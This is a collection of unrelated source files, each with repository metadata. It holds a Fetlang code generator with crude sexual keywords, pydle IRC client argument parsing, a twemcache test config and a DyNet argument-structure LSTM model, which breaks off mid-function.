"ratio": 3.4939024390243905,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.47117616595243905,
"avg_score": null,
"num_lines": null
} |
iterations = 40;
gridWidth = 40;
## Vars ##
indentLevel = 0;
file = open("110-generated.fet", "w")
def indent():
global indentLevel
indentLevel = indentLevel + 1
def unindent():
global indentLevel
indentLevel = indentLevel - 1
def newline():
printCode( "" )
def printCode( code ):
global indentLevel
file.write( "\t" * indentLevel )
file.write( code )
file.write( "\n" )
## These things are constant for any size
def generateIntro():
printCode( 'Make Laura moan' )
printCode( 'Make Julia moan "#' + "0" * (gridWidth-3) + '1#"' )
newline()
printCode( 'Make startString moan "#0"' )
printCode( 'Make endString moan "0#"' )
newline()
printCode( 'Lick AsciiZero forty eight times' )
printCode( 'Lick AsciiOne forty nine times' )
printCode( 'Lick AsciiOcto\'s thigh thirty five times' )
newline()
printCode ( "Worship Counter" )
printCode ( "Worship iterations" )
newline()
printCode( "Worship left" )
printCode( "Worship middle" )
printCode( "Worship right" )
newline()
newline()
newline()
## A better solution would write the string literal for the number, but this is generated code, so allow my laziness.
def generateNumbers():
printCode( "Worship number0" )
for i in range( 1, max(gridWidth - 1, iterations)+1 ):
variableName = "number" + str( i )
for j in range (0, i):
printCode( "lick " + variableName )
newline()
newline()
def beginLoop():
printCode( "while iterations is submissive to Number" + str(iterations) )
indent()
newline()
newline()
def setEmptyPositions():
for i in range (2, gridWidth - 2):
printCode( "make position" + str(i) + " moan")
printCode( "make nextposition" + str(i) + " moan")
newline()
newline()
def resetTempVariables():
printCode( "Have left spank left" )
printCode( "Have middle spank middle" )
printCode( "Have right spank right" )
printCode( "Have counter spank counter" )
printCode( "Make Laura moan" )
newline()
def incrementLoopCounter():
printCode( "lick iterations" )
newline()
def printCurrentState():
printCode( "Make Slave Scream Julia" )
newline()
def generateParentString( pos ):
printCode( "If counter is submissive to number" + str( pos + 2 ) )
indent()
printCode( "If counter is dominant towards number" + str( pos -2 ) )
indent()
printCode( "Have Emma hogtie position" + str( pos ) )
unindent()
unindent()
newline()
#This function is the main trick to running the 110.
#For each cell, we create a string that contains three chars:
#The ones relevant to it's activation.
def getParentStrings():
printCode( "Bind Emma to Julia" )
indent()
printCode( "If Emma is not AsciiOcto" )
indent()
for i in range (2, gridWidth - 2):
generateParentString( i )
unindent()
printCode( "lick counter" )
unindent()
newline()
newline()
newline()
def getDescendants():
for i in range (2, gridWidth - 2):
getDescendant( i )
newline()
newline()
newline()
def getDescendant( pos ):
printCode( "Have counter spank counter" )
printCode( "Have left spank left" )
printCode( "Have middle spank middle" )
printCode( "Have right spank right" )
newline()
newline()
printCode( "Bind Emma to position" + str( pos ) )
indent()
printCode( "if counter is number0" )
indent()
printCode( "If Emma is AsciiZero" )
indent()
printCode( "Have AsciiZero lick left" )
unindent()
printCode( "Otherwise" )
indent()
printCode( "Have AsciiOne lick left" )
unindent()
unindent()
printCode( "if counter is number1" )
indent()
printCode( "If Emma is AsciiZero" )
indent()
printCode( "Have AsciiZero lick middle" )
unindent()
printCode( "Otherwise" )
indent()
printCode( "Have AsciiOne lick middle" )
unindent()
unindent()
printCode( "if counter is number2" )
indent()
printCode( "If Emma is AsciiZero" )
indent()
printCode( "Have AsciiZero lick right" )
unindent()
printCode( "Otherwise" )
indent()
printCode( "Have AsciiOne lick right" )
unindent()
unindent()
printCode( "Lick counter" )
unindent()
newline()
newline()
printCode( "if left is AsciiOne" )
indent()
printCode( "if middle is AsciiOne" )
indent()
printCode( "if right is AsciiZero" )
indent()
printCode( "Have AsciiOne hogtie nextposition" + str( pos ) )
unindent()
printCode( "otherwise" )
indent()
printCode( "have AsciiZero hogtie nextposition" + str( pos ) )
unindent()
unindent()
printCode( "if middle is AsciiZero" )
indent()
printCode( "if right is AsciiOne" )
indent()
printCode( "have AsciiOne hogtie nextposition" + str( pos ) )
unindent()
printCode( "otherwise" )
indent()
printCode( "have AsciiZero hogtie nextposition" + str( pos ) )
unindent()
unindent()
unindent()
printCode( "if left is AsciiZero" )
indent()
printCode( "if middle is AsciiOne" )
indent()
printCode( "Have AsciiOne hogtie nextposition" + str( pos ) )
unindent()
printCode( "otherwise" )
indent()
printCode( "if right is AsciiOne" )
indent()
printCode( "Have AsciiOne hogtie nextposition" + str( pos ) )
unindent()
printCode( "otherwise" )
indent()
printCode( "have AsciiZero hogtie nextposition" + str( pos ) )
unindent()
unindent()
unindent()
newline()
newline()
newline()
def writeNextGeneration():
printCode( "make Laura moan \"#0\"" )
for i in range (2, gridWidth - 2):
writeNextGenerationPosition( i )
printCode( "have AsciiZero hogtie Laura" )
printCode( "have AsciiOcto hogtie Laura" )
newline()
newline()
newline()
def writeNextGenerationPosition( pos ):
printCode( "bind Emma to nextposition" + str( pos ) )
indent()
printCode( "if Emma is AsciiZero" )
indent()
printCode( "have AsciiZero hogtie Laura" )
unindent()
printCode( "otherwise" )
indent()
printCode( "have AsciiOne hogtie Laura" )
unindent()
unindent()
def saveNextGeneration():
printCode( "Make Julia moan" )
printCode( "bind Emma to Laura" )
indent()
printCode( "have Emma hogtie Julia" )
def main():
generateIntro()
generateNumbers()
beginLoop()
resetTempVariables()
setEmptyPositions()
incrementLoopCounter()
printCurrentState()
getParentStrings()
getDescendants()
writeNextGeneration()
saveNextGeneration()
main()
| {
"repo_name": "KjeldSchmidt/Fetlang_110",
"path": "generator.py",
"copies": "1",
"size": "6098",
"license": "unlicense",
"hash": -8928657768424851000,
"line_mean": 21.5018450185,
"line_max": 117,
"alpha_frac": 0.693014103,
"autogenerated": false,
"ratio": 2.7518050541516246,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.39448191571516245,
"avg_score": null,
"num_lines": null
} |
## _args.py
# Common argument parsing code.
import argparse
import functools
import logging
import pydle
def client_from_args(name, description, default_nick='Bot', cls=pydle.Client):
# Parse some arguments.
parser = argparse.ArgumentParser(name, description=description, add_help=False,
epilog='This program is part of {package}.'.format(package=pydle.__name__))
meta = parser.add_argument_group('Meta')
meta.add_argument('-h', '--help', action='help', help='What you are reading right now.')
meta.add_argument('-v', '--version', action='version', version='{package}/%(prog)s {ver}'.format(package=pydle.__name__, ver=pydle.__version__), help='Dump version number.')
meta.add_argument('-V', '--verbose', help='Be verbose in warnings and errors.', action='store_true', default=False)
meta.add_argument('-d', '--debug', help='Show debug output.', action='store_true', default=False)
conn = parser.add_argument_group('Connection')
conn.add_argument('server', help='The server to connect to.', metavar='SERVER')
conn.add_argument('-p', '--port', help='The port to use. (default: 6667, 6697 (TLS))')
conn.add_argument('-P', '--password', help='Server password.', metavar='PASS')
conn.add_argument('--tls', help='Use TLS. (default: no)', action='store_true', default=False)
conn.add_argument('--verify-tls', help='Verify TLS certificate sent by server. (default: no)', action='store_true', default=False)
conn.add_argument('-e', '--encoding', help='Connection encoding. (default: UTF-8)', default='utf-8', metavar='ENCODING')
init = parser.add_argument_group('Initialization')
init.add_argument('-n', '--nickname', help='Nickname. Can be set multiple times to set fallback nicknames. (default: {})'.format(default_nick), action='append', dest='nicknames', default=[], metavar='NICK')
init.add_argument('-u', '--username', help='Username. (default: derived from nickname)', metavar='USER')
init.add_argument('-r', '--realname', help='Realname (GECOS). (default: derived from nickname)', metavar='REAL')
init.add_argument('-c', '--channel', help='Channel to automatically join. Can be set multiple times for multiple channels.', action='append', dest='channels', default=[], metavar='CHANNEL')
auth = parser.add_argument_group('Authentication')
auth.add_argument('--sasl-identity', help='Identity to use for SASL authentication. (default: <empty>)', default='', metavar='SASLIDENT')
auth.add_argument('--sasl-username', help='Username to use for SASL authentication.', metavar='SASLUSER')
auth.add_argument('--sasl-password', help='Password to use for SASL authentication.', metavar='SASLPASS')
auth.add_argument('--sasl-mechanism', help='Mechanism to use for SASL authentication.', metavar='SASLMECH')
auth.add_argument('--tls-client-cert', help='TLS client certificate to use.', metavar='CERT')
auth.add_argument('--tls-client-cert-keyfile', help='Keyfile to use for TLS client cert.', metavar='KEYFILE')
args = parser.parse_args()
# Set nicknames straight.
if not args.nicknames:
nick = default_nick
fallback = []
else:
nick = args.nicknames.pop(0)
fallback = args.nicknames
# Set log level.
if args.debug:
log_level = logging.DEBUG
elif not args.verbose:
log_level = logging.ERROR
logging.basicConfig(level=log_level)
# Setup client and connect.
client = cls(nickname=nick, fallback_nicknames=fallback, username=args.username, realname=args.realname,
sasl_identity=args.sasl_identity, sasl_username=args.sasl_username, sasl_password=args.sasl_password, sasl_mechanism=args.sasl_mechanism,
tls_client_cert=args.tls_client_cert, tls_client_cert_key=args.tls_client_cert_keyfile)
connect = functools.partial(client.connect,
hostname=args.server, port=args.port, password=args.password, encoding=args.encoding,
channels=args.channels, tls=args.tls, tls_verify=args.verify_tls
)
return client, connect
| {
"repo_name": "Shizmob/pydle",
"path": "pydle/utils/_args.py",
"copies": "1",
"size": "4050",
"license": "bsd-3-clause",
"hash": 2717457625572672000,
"line_mean": 57.6956521739,
"line_max": 210,
"alpha_frac": 0.6891358025,
"autogenerated": false,
"ratio": 3.7569573283858997,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.49460931308858996,
"avg_score": null,
"num_lines": null
} |
## _args.py
# Common argument parsing code.
import argparse
import logging
import pydle
def client_from_args(name, description, default_nick='Bot', cls=pydle.Client):
# Parse some arguments.
parser = argparse.ArgumentParser(name, description=description, add_help=False,
epilog='This program is part of {package}.'.format(package=pydle.__name__))
meta = parser.add_argument_group('Meta')
meta.add_argument('-h', '--help', action='help', help='What you are reading right now.')
meta.add_argument('-v', '--version', action='version', version='{package}/%(prog)s {ver}'.format(package=pydle.__name__, ver=pydle.__version__), help='Dump version number.')
meta.add_argument('-V', '--verbose', help='Be verbose in warnings and errors.', action='store_true', default=False)
meta.add_argument('-d', '--debug', help='Show debug output.', action='store_true', default=False)
conn = parser.add_argument_group('Connection')
conn.add_argument('server', help='The server to connect to.', metavar='SERVER')
conn.add_argument('-p', '--port', help='The port to use. (default: 6667, 6697 (TLS))')
conn.add_argument('-P', '--password', help='Server password.', metavar='PASS')
conn.add_argument('--tls', help='Use TLS. (default: no)', action='store_true', default=False)
conn.add_argument('--verify-tls', help='Verify TLS certificate sent by server. (default: no)', action='store_true', default=False)
conn.add_argument('-e', '--encoding', help='Connection encoding. (default: UTF-8)', default='utf-8', metavar='ENCODING')
init = parser.add_argument_group('Initialization')
init.add_argument('-n', '--nickname', help='Nickname. Can be set multiple times to set fallback nicknames. (default: {})'.format(default_nick), action='append', dest='nicknames', default=[], metavar='NICK')
init.add_argument('-u', '--username', help='Username. (default: derived from nickname)', metavar='USER')
init.add_argument('-r', '--realname', help='Realname (GECOS). (default: derived from nickname)', metavar='REAL')
init.add_argument('-c', '--channel', help='Channel to automatically join. Can be set multiple times for multiple channels.', action='append', dest='channels', default=[], metavar='CHANNEL')
auth = parser.add_argument_group('Authentication')
auth.add_argument('--sasl-identity', help='Identity to use for SASL authentication. (default: <empty>)', default='', metavar='SASLIDENT')
auth.add_argument('--sasl-username', help='Username to use for SASL authentication.', metavar='SASLUSER')
auth.add_argument('--sasl-password', help='Password to use for SASL authentication.', metavar='SASLPASS')
auth.add_argument('--tls-client-cert', help='TLS client certificate to use.', metavar='CERT')
auth.add_argument('--tls-client-cert-keyfile', help='Keyfile to use for TLS client cert.', metavar='KEYFILE')
auth.add_argument('--nickserv-password', help='NickServ password to identify with.', metavar='NSPASS')
args = parser.parse_args()
# Set nicknames straight.
if not args.nicknames:
nick = default_nick
fallback = []
else:
nick = args.nicknames.pop(0)
fallback = args.nicknames
# Set log level.
if args.debug:
log_level = logging.DEBUG
elif not args.verbose:
log_level = logging.ERROR
logging.basicConfig(level=log_level)
# Setup client and connect.
client = cls(nickname=nick, fallback_nicknames=fallback, username=args.username, realname=args.realname,
sasl_identity=args.sasl_identity, sasl_username=args.sasl_username, sasl_password=args.sasl_password,
tls_client_cert=args.tls_client_cert, tls_client_cert_key=args.tls_client_cert_keyfile,
nickserv_password=args.nickserv_password)
client.connect(hostname=args.server, port=args.port, password=args.password, encoding=args.encoding,
channels=args.channels, tls=args.tls, tls_verify=args.verify_tls)
return client
| {
"repo_name": "suut/psychic-happiness",
"path": "pydle/utils/_args.py",
"copies": "1",
"size": "3991",
"license": "unlicense",
"hash": 3083694092967911000,
"line_mean": 58.5671641791,
"line_max": 210,
"alpha_frac": 0.6885492358,
"autogenerated": false,
"ratio": 3.7650943396226415,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9923855875245309,
"avg_score": 0.005957540035466526,
"num_lines": 67
} |
ARGS_UNARY = {
'DAEMON':'-d',
'MAX_CORE':'-r',
'LOCK_PAGE':'-k',
'HELP':'-h',
'LICENSE':'-i',
'LARGEPAGE':'-L',
'PREALLOC':'-E',
'CAS':'-C'
}
ARGS_BINARY = {
'PORT':'-p',
'UDP':'-U',
'SOCKET':'-s',
'ACCESS':'-a',
'SERVER':'-l',
'USER':'-u',
'EVICTION':'-M',
'MAX_MEMORY':'-m',
'CONNECTIONS':'-c',
'VERBOSITY':'-v',
'PIDFILE':'-P',
'FACTOR':'-f',
'ITEM_MIN_SIZE':'-n',
'DELIMITER':'-D',
'THREADS':'-t',
'BACKLOG':'-b',
'SLAB_SIZE':'-I',
'AGGR_INTERVAL':'-A',
'SLAB_PROFILE':'-z'
}
EXEC = 'src/twemcache'
# Unary arguments
DAEMON = False
MAX_CORE = False
LOCK_PAGE = False
HELP = False
LICENSE = False
LARGEPAGE = False
PREALLOC = False
CAS = False
# Binary arguments
PORT = '11211' # server (TCP) port (-p)
UDP = None
SOCKET = None
ACCESS = None
SERVER = '127.0.0.1' # server IP (-l)
USER = None
EVICTION = 2 # random slab eviction by default
MAX_MEMORY = 4 # max amount memory allocated, in MB (-m)
CONNECTIONS = 256 # max number of concurrent connections allowed (-c)
VERBOSITY = 5 # logging verbosity
PIDFILE = None
FACTOR = None # factor of slab growth (-f)
ITEM_MIN_SIZE = None # item size, smallest (-n)
DELIMITER = None
THREADS = 2 # number of threads (-t)
BACKLOG = 1024
SLAB_SIZE = 1024 * 1024 # (-I)
AGGR_INTERVAL = 100000 # aggregation interval of stats, in milliseconds (-A)
# internals, not used by launching service but useful for data generation
ALIGNMENT = 8 # bytes
ITEM_OVERHEAD = 86 # per-item storage overhead at the server
SLAB_PROFILE = "136,176,216,264,320,392,480,592,736,1024"
# global stats (returns of "stats" command)
STATS_KEYS = [ # system/service info
'pid', 'uptime', 'time', 'version', 'pointer_size', 'aggregate_ts',
'rusage_user', 'rusage_system',
# connection related
'conn_disabled', 'conn_total', 'conn_struct', 'conn_yield', 'conn_curr',
# item/slab related
'item_curr', 'item_free', 'item_acquire', 'item_remove', 'item_evict', 'item_expire',
'slab_req', 'slab_error', 'slab_alloc', 'slab_curr', 'slab_evict',
# things in bytes
'data_read', 'data_written', 'data_curr', 'data_value_curr',
# time stamps
'item_expire_ts', 'item_retire_ts', 'item_evict_ts',
'slab_req_ts', 'slab_error_ts', 'slab_alloc_ts', 'slab_new_ts', 'slab_evict_ts',
# command related
'set', 'set_success',
'add', 'add_exist', 'add_success',
'replace', 'replace_hit', 'replace_miss', 'replace_success',
'append', 'append_hit', 'append_miss', 'append_success',
'prepend', 'prepend_hit', 'prepend_miss', 'prepend_success',
'delete', 'delete_hit', 'delete_miss',
'incr', 'incr_hit', 'incr_miss', 'incr_success',
'decr', 'decr_hit', 'decr_miss', 'decr_success',
'cas', 'cas_badval', 'cas_hit', 'cas_miss', 'cas_success',
'get', 'get_hit', 'get_miss',
'gets', 'gets_hit', 'gets_miss',
'flush',
'stats',
# general errors
'cmd_error', 'server_error',
'klog_logged', 'klog_discarded', 'klog_skipped'
]
SETTINGS_KEYS = [
'prealloc', 'lock_page', 'accepting_conns', 'daemonize', 'max_corefile',
'cas_enabled', 'num_workers', 'reqs_per_event', 'oldest',
'log_filename', 'verbosity', 'maxconns', 'tcpport', 'udpport', 'inter',
'domain_socket', 'umask', 'tcp_backlog', 'evictions', 'growth_factor', 'maxbytes',
'chunk_size', 'slab_size', 'slab_profile', 'username', 'stats_agg_intvl']
STATS_DELAY = float(AGGR_INTERVAL) * 1.5 / 1000000
# time we wait before getting for stats
| {
"repo_name": "twitter/twemcache",
"path": "tests/config/server/mem4mb.py",
"copies": "3",
"size": "3531",
"license": "bsd-3-clause",
"hash": 6012934092762226,
"line_mean": 31.3944954128,
"line_max": 89,
"alpha_frac": 0.6066270178,
"autogenerated": false,
"ratio": 2.877750611246944,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.49843776290469444,
"avg_score": null,
"num_lines": null
} |
"""Argumentation structure RNN using dynet and AD3 inference"""
# Author: Vlad Niculae <vlad@vene.ro>
# License: BSD 3-clause
import warnings
from collections import Counter
from time import time
import numpy as np
import dynet as dy
from sklearn.utils import shuffle
from marseille.struct_models import BaseArgumentMixin
from marseille.inference import loss_augment_unaries
from marseille.custom_logging import logging
from marseille.dynet_utils import (MultiLayerPerceptron, Bilinear,
MultilinearFactored)
class LinkMLP(dy.Saveable):
"""Argumentation link encoder with a multi-layer perceptron:
Performs MLP(concat(src, trg)"""
def __init__(self, n_in, n_hid, n_out, n_layers, model):
self.mlp = MultiLayerPerceptron(
[2 * n_in] + [n_hid] * n_layers + [n_out], activation=dy.rectify,
model=model)
def __call__(self, src, trg):
return self.mlp(dy.concatenate([src, trg]))
def get_components(self):
return [self.mlp]
def restore_components(self, components):
self.mlp = components[0]
def set_dropout(self, dropout):
self.mlp.dropout = dropout
class LinkBilinear(dy.Saveable):
"""Bilinear argumentation link encoder:
src_t = MLP_src(src)
trg_t = MLP_trg(trg)
return src_t' * W * trg_t + linear and bias terms
"""
def __init__(self, n_in, n_hid, n_out, n_layers, model):
dims = [n_in] + [n_hid] * n_layers,
self.src_mlp = MultiLayerPerceptron(dims, activation=dy.rectify,
model=model)
self.trg_mlp = MultiLayerPerceptron(dims, activation=dy.rectify,
model=model)
self.bilinear = Bilinear(n_hid, n_out, model=model)
def __call__(self, src, trg):
return self.bilinear(
dy.rectify(self.src_mlp(src)), # HOTFIX rectify here?
dy.rectify(self.trg_mlp(trg)))
def get_components(self):
return [self.src_mlp, self.trg_mlp, self.bilinear]
def restore_components(self, components):
self.src_mlp, self.trg_mlp, self.bilinear = components
def set_dropout(self, dropout):
self.src_mlp.dropout = dropout
self.trg_mlp.dropout = dropout
class SecondOrderMLP(dy.Saveable):
"""Second-order encoders using multi-layer perceptrons:
phi(a, b, c) = MLP(concat(a, b, c))
"""
def __init__(self, n_in, n_hid, n_layers, model):
second_order_dims = [3 * n_in] + [n_hid] * n_layers + [1]
self.mlp = MultiLayerPerceptron(second_order_dims,
activation=dy.rectify,
model=model)
def __call__(self, a, b, c):
return self.mlp(dy.concatenate([a, b, c]))
def get_components(self):
return [self.mlp]
def restore_components(self, components):
self.mlp = components[0]
def set_dropout(self, dropout):
self.mlp.dropout = dropout
class SecondOrderMultilinear(dy.Saveable):
"""Second-order encoder using low-rank multilinear term:
a_t, b_t, c_t = MLP_a(a), MLP_b(b), MLP_c(c)
w_ijk = sum_0<r<rank u^(a)_ir u^(b)_jr u^(c)_kr
phi(a, b, c) = sum_ijk a_i b_j c_k w_ijk
"""
def __init__(self, n_in, n_hid, n_layers, model, n_components=16):
dims = [n_in] + [n_hid] * n_layers
self.a_mlp = MultiLayerPerceptron(dims, activation=dy.rectify,
model=model)
self.b_mlp = MultiLayerPerceptron(dims, activation=dy.rectify,
model=model)
self.c_mlp = MultiLayerPerceptron(dims, activation=dy.rectify,
model=model)
self.multilinear = MultilinearFactored(n_features=1 + n_hid,
n_inputs=3,
n_components=n_components,
model=model)
def __call__(self, a, b, c):
enc = [dy.rectify(self.a_mlp(a)), # HOTFIX rectify here?
dy.rectify(self.b_mlp(b)),
dy.rectify(self.c_mlp(c))]
enc = [dy.concatenate([dy.scalarInput(1), x]) for x in enc]
return self.multilinear(*enc)
def get_components(self):
return [self.a_mlp, self.b_mlp, self.c_mlp, self.multilinear]
def restore_components(self, components):
self.a_mlp, self.b_mlp, self.c_mlp, self.multilinear = components
def set_dropout(self, dropout):
self.a_mlp.dropout = dropout
self.b_mlp.dropout = dropout
self.c_mlp.dropout = dropout
class ArgumentLSTM(BaseArgumentMixin):
"""Argumentation parser using LSTM features and structured hinge loss.
Parameters
----------
max_iter: int, default: 100
Total number of iterations (epochs) to perform.
score_at_iter: list or None, default: None
Number of iterations after which to compute scores on validation data.
n_embed: int, default: 128
Embedding size. Ignored if existing embeddings passed to `embeds`.
lstm_layers: int, default: 2
Number of LSTM layers to use.
prop_mlp_layers: int, default: 2
Number of layers in proposition MLP encoder.
link_mlp_layers: int, default: 1
Number of layers in link encoder (either as MLP or as preprocessing
before the bilinear calculation.)
link_bilinear: bool, default: True
Whether to use bilinear model for encoding link potentials.
n_lstm: int, default: 128
LSTM hidden layer size. (Must be even: is split into forward and
backward LSTMs equally.)
n_mlp: int, default: 128
Hidden layer size across all MLPs.
lstm_dropout: float, default 0
Amount of LSTM dropout. Might be buggy in dynet at the moment.
mlp_dropout: float, default: 0.1
Amount of dropout to apply across all MLPs in the model.
embeds: tuple or None, default: None
Tuple of (embed_data, embed_vocab) for GloVe initialization
class_weight: "balanced" or None, default: "balanced"
Scaling for the negative link class cost. Does not influence
proposition loss.
exact_inference: bool, default: False
Whether to use branch & bound at every iteration to get exact
solutions. Can be very slow.
compat_features: bool, default: False
Whether to use structural features to parametrize the compatibility
factors. Documents should be preprocessed accordingly.
constraints: {"ukp"|"ukp+strict"|"cdcp"|"cdcp+strict"|None}, default: None
What kind of constraints to apply in decoding.
second_order_multilinear: bool, default: True
Whether to use low-rank multilinear encoder for second order
potentials (only used if at least one of
(coparent|grandparent|sibling)_layers is nonzero.
coparent_layers: int, default: 0
Number of layers to use in coparent potential encoding. If 0,
coparents are not used.
grandparent_layers: int, default: 0
Number of layers to use in grandparent potential encoding. If 0,
grandparent are not used.
sibling_layers: int, default: 0
Number of layers to use in sibling potential encoding. If 0,
sibling are not used.
multilinear_rank: int, default: 16
Rank of the third-order tensor for coparent, grandparent and sibling
potentials. Only used if at least one of such potentials is on, and if
`second_order_multilinear=True`.
"""
def __init__(self, max_iter=100, score_at_iter=None, n_embed=128,
lstm_layers=2, prop_mlp_layers=2, link_mlp_layers=1,
link_bilinear=True, n_lstm=128, n_mlp=128,
lstm_dropout=0.0, mlp_dropout=0.1, embeds=None,
class_weight=None, exact_inference=False,
compat_features=False, constraints=None,
second_order_multilinear=True, coparent_layers=0,
grandparent_layers=0, sibling_layers=0,
exact_test=False):
self.max_iter = max_iter
self.score_at_iter = score_at_iter
self.n_embed = n_embed
self.lstm_layers = lstm_layers
self.prop_mlp_layers = prop_mlp_layers
self.link_mlp_layers = link_mlp_layers
self.link_bilinear = link_bilinear
self.n_lstm = n_lstm
self.n_mlp = n_mlp
self.lstm_dropout = lstm_dropout
self.mlp_dropout = mlp_dropout
self.embeds = embeds
self.class_weight = class_weight
self.exact_inference = exact_inference
self.compat_features = compat_features
self.constraints = constraints
self.second_order_multilinear = second_order_multilinear
self.coparent_layers = coparent_layers
self.grandparent_layers = grandparent_layers
self.sibling_layers = sibling_layers
self.exact_test = exact_test
def build_vocab(self, docs):
special_toks = ["__UNK__"]
word_df = Counter(tok for doc in docs for tok in set(doc.tokens()))
vocab = special_toks + [w for w, df in sorted(word_df.items())
if df > 1]
inv_vocab = {word: k for k, word in enumerate(vocab)}
self.UNK = inv_vocab["__UNK__"]
self.inv_vocab = inv_vocab
self.vocab = vocab
def init_params(self):
self.model = dy.Model()
self._trainer = dy.AdamTrainer(self.model)
if self.embeds is not None:
sz = self.embeds[1].shape[1]
self.n_embed = sz
logging.info("Overriding n_embeds to glove size {}".format(sz))
self._embed = self.model.add_lookup_parameters((len(self.vocab),
self.n_embed))
if self.embeds is not None: # initialize embeddings with glove
logging.info("Initializing embeddings...")
embed_vocab, embed_data = self.embeds
inv_embed = {w: k for k, w in enumerate(embed_vocab)}
for k, w in enumerate(self.vocab):
if w in inv_embed:
self._embed.init_row(k, embed_data[inv_embed[w]])
logging.info("...done")
self._rnn = dy.BiRNNBuilder(self.lstm_layers, self.n_embed,
self.n_lstm, self.model, dy.LSTMBuilder)
# proposition classifier MLP
self._prop_mlp = MultiLayerPerceptron(
[self.n_lstm] +
[self.n_mlp] * self.prop_mlp_layers +
[self.n_prop_states],
activation=dy.rectify,
model=self.model)
# link classifier MLP (possibly bilinear)
LinkEncoder = LinkBilinear if self.link_bilinear else LinkMLP
self._link = LinkEncoder(self.n_lstm, self.n_mlp, self.n_link_states,
self.link_mlp_layers, self.model)
# compatibility (trigram) factors, optionally with features
n_compat = self.n_prop_states ** 2 * self.n_link_states
if self.compat_features:
n_compat *= self.n_compat_features
self._compat = self.model.add_parameters(n_compat,
init=dy.ConstInitializer(0))
# optional second-order scorers
SecondOrderEncoder = (SecondOrderMultilinear
if self.second_order_multilinear
else SecondOrderMLP)
if self.coparent_layers: # scorer for a -> b <- c
self._coparent = SecondOrderEncoder(self.n_lstm, self.n_mlp,
self.coparent_layers,
self.model)
if self.grandparent_layers: # scorer for a -> b -> c
self._grandparent = SecondOrderEncoder(self.n_lstm, self.n_mlp,
self.grandparent_layers,
self.model)
if self.sibling_layers: # scorer for a <- b -> c
self._sibling = SecondOrderEncoder(self.n_lstm, self.n_mlp,
self.sibling_layers,
self.model)
def __getstate__(self):
return {k: v for k, v in self.__dict__.items()
if k != 'model' and k[0] != '_'}
def save(self, filename):
params = [self._compat, self._embed, self._rnn, self._prop_mlp,
self._link]
if self.coparent_layers:
params.extend([self._coparent])
if self.grandparent_layers:
params.extend([self._grandparent])
if self.sibling_layers:
params.extend([self._sibling])
self.model.save(filename, params)
def load(self, filename):
self.init_params()
saved = self.model.load(filename)
(self._compat, self._embed, self._rnn, self._prop_mlp,
self._link) = saved[:5]
saved = saved[5:]
saved.reverse() # so we can just pop
if self.coparent_layers:
self._coparent = saved.pop()
if self.grandparent_layers:
self._grandparent = saved.pop()
if self.sibling_layers:
self._sibling = saved.pop()
assert len(saved) == 0
def build_cg(self, doc, training=True):
dy.renew_cg()
# dropout
if training:
self._rnn.set_dropout(self.lstm_dropout)
drop = self.mlp_dropout
else:
self._rnn.disable_dropout()
drop = 0
self._prop_mlp.dropout = drop
self._link.set_dropout(drop)
if self.sibling_layers:
self._sibling.set_dropout(drop)
if self.grandparent_layers:
self._grandparent.set_dropout(drop)
if self.coparent_layers:
self._coparent.set_dropout(drop)
# lookup token embeddings
tok_ids = (self.inv_vocab.get(tok, self.UNK) for tok in doc.tokens())
embeds = [dy.lookup(self._embed, tok) for tok in tok_ids]
# pass through bidi LSTM
rnn_out = self._rnn.transduce(embeds)
# map character offsets to token offsets
tok_offset = np.array(doc.tokens(key='characterOffsetBegin',
lower=False))
# get an average representation for each proposition
prop_repr = []
prop_potentials = []
link_potentials = []
coparent_potentials = []
grandparent_potentials = []
sibling_potentials = []
for offset in doc.prop_offsets:
start, end = np.searchsorted(tok_offset, offset)
prop = dy.average(rnn_out[start:end])
prop_potentials.append(self._prop_mlp(prop))
prop_repr.append(prop)
for src, trg in doc.link_to_prop:
link_potentials.append(self._link(prop_repr[src], prop_repr[trg]))
# optional second order factor scores
any_second_order = (self.coparent_layers or
self.grandparent_layers or
self.sibling_layers)
if any_second_order:
for a, b, c in doc.second_order:
x = (prop_repr[a], prop_repr[b], prop_repr[c])
if self.coparent_layers:
coparent_potentials.append(self._coparent(*x))
if self.grandparent_layers:
grandparent_potentials.append(self._grandparent(*x))
if self.sibling_layers:
sibling_potentials.append(self._sibling(*x))
compat = dy.parameter(self._compat)
return (prop_potentials,
link_potentials,
compat,
coparent_potentials,
grandparent_potentials,
sibling_potentials)
def _get_potentials(self, doc, dy_potentials):
props, links, compat, coparents, grandpas, siblings = dy_potentials
prop_potentials = dy.concatenate_cols(props)
prop_potentials = prop_potentials.value().astype(np.double).T
link_potentials = dy.concatenate_cols(links)
link_potentials = link_potentials.value().astype(np.double).T
if self.compat_features:
w_compat = compat.npvalue().reshape(self.n_compat_features, -1)
compat_potentials = (np.dot(doc.compat_features, w_compat)
.reshape(-1,
self.n_prop_states,
self.n_prop_states,
self.n_link_states))
else:
compat_potentials = compat.npvalue().reshape(self.n_prop_states,
self.n_prop_states,
self.n_link_states)
coparent_potentials = (dy.concatenate(coparents).value()
if coparents else [])
grandparent_potentials = (dy.concatenate(grandpas).value()
if grandpas else [])
sibling_potentials = (dy.concatenate(siblings).value()
if siblings else [])
return (prop_potentials, link_potentials, compat_potentials,
coparent_potentials, grandparent_potentials,
sibling_potentials)
def _doc_loss(self, doc, y):
dy_potentials = self.build_cg(doc)
potentials = self._get_potentials(doc, dy_potentials)
# unpack all potentials
(dy_prop_potentials,
dy_link_potentials,
dy_compat_potentials,
dy_coparent_potentials,
dy_grandparent_potentials,
dy_sibling_potentials) = dy_potentials
(prop_potentials,
link_potentials,
compat_potentials,
coparent_potentials,
grandparent_potentials,
sibling_potentials) = potentials
y_prop = self.prop_encoder_.transform(y.nodes)
y_link = self.link_encoder_.transform(y.links)
loss_augment_unaries(prop_potentials, y_prop, self.prop_cw_)
loss_augment_unaries(link_potentials, y_link, self.link_cw_)
y_hat, status = self._inference(doc, potentials, relaxed=True,
exact=self.exact_inference,
constraints=self.constraints)
(prop_marg,
link_marg,
compat_marg,
second_order_marg) = self._marg_fractional(doc, y_hat)
(Y_prop,
Y_link,
compat_true,
second_order_true) = self._marg_rounded(doc, y)
# proposition loss
prop_ix = np.arange(len(y_prop))
prop_cws = self.prop_cw_[y_prop]
prop_hamm = prop_cws * (1 - prop_marg[prop_ix, y_prop])
diffs = prop_marg - Y_prop
